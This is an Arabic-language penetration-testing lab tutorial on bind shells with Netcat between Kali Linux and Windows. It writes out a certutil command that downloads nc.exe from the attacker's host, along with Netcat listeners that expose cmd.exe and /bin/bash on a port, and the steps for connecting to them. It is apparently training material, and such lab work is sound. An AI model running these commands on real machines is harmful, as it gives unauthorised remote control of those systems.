✨ المختبر 8: إنشاء صدفات مرتبطة (Bind Shells Lab)

🎯 الهدف الأساسي: فهم وإنشاء الصدفات المرتبطة (Bind Shells) بين نظامي Kali Linux وWindows باستخدام Netcat.

🔧 الأدوات المستخدمة:

  • Netcat (NC)

  • Python (لخادم HTTP بسيط على Kali Linux)

  • Windows Command Prompt (CMD)

📜 خطوات التنفيذ:

1. نقل nc.exe إلى نظام Windows: 🗣️ نظراً لأن Netcat ليس مدمجاً في Windows، فيجب نقله أولاً إلى نظام Windows المستهدف.

  • تشغيل خادم HTTP على Kali Linux (في المسار windows-resources/binaries/):

    cd /usr/share/windows-resources/binaries/
    python3 -m http.server 80
  • تنزيل nc.exe من Windows:

    certutil.exe -urlcache -f http://[عنوان IP الخاص بـ Kali]/nc.exe nc.exe

    🔗 ربط سلسلة الأدوات: هذا يجعل nc.exe متاحاً على Windows لإنشاء الصدفة المرتبطة.

2. إعداد مستمع الصدفة المرتبطة (Bind Listener) على نظام Windows: 🗣️ لإنشاء صدفة مرتبطة، فسوف تقوم بتشغيل Netcat على نظام Windows المستهدف كمستمع (listener) على منفذ معين، وتجعله ينفذ cmd.exe عند الاتصال. cmd nc.exe -lvp 1234 -e cmd.exe

3. الاتصال بالصدفة المرتبطة من Kali Linux: 🗣️ من Kali Linux (المهاجم)، فسوف تقوم بالاتصال بمنفذ المستمع على نظام Windows. bash nc -nv [عنوان IP الخاص بـ Windows] 1234 🔗 ربط سلسلة الأدوات: لو نجح الاتصال، فسوف تحصل على واجهة سطر أوامر (CMD) لنظام Windows داخل طرفية Kali Linux.

4. تنفيذ الأوامر والتحقق من الامتيازات: 🗣️ بعد الحصول على الصدفة، يمكنك تنفيذ أوامر Windows للتحقق من وصولك وامتيازاتك. cmd whoami systeminfo dir

5. إنشاء صدفة مرتبطة (Bind Listener) على Linux والاتصال بها من Windows (للتجربة): 🗣️ لإثبات مرونة Netcat، يمكنك عكس العملية: تشغيل مستمع صدفة على Linux والاتصال به من Windows.

  • على Kali Linux (المستمع):

    nc -nvlp 1234 -e /bin/bash
  • على Windows (العميل):

    nc.exe -nv [عنوان IP الخاص بـ Kali] 1234

    🔗 ربط سلسلة الأدوات: لو نجح الاتصال، فسوف تحصل على واجهة Bash لنظام Linux داخل سطر أوامر Windows.

نقاط التحقق:

  • تم نقل nc.exe إلى نظام Windows بنجاح.

  • تم إنشاء صدفة مرتبطة بنجاح من Windows إلى Kali Linux.

  • تم تنفيذ أوامر Windows بنجاح عبر الصدفة.

  • تم إنشاء صدفة مرتبطة بنجاح من Linux إلى Windows.

  • تم تنفيذ أوامر Linux بنجاح عبر الصدفة (باستخدام Bash).

Last updated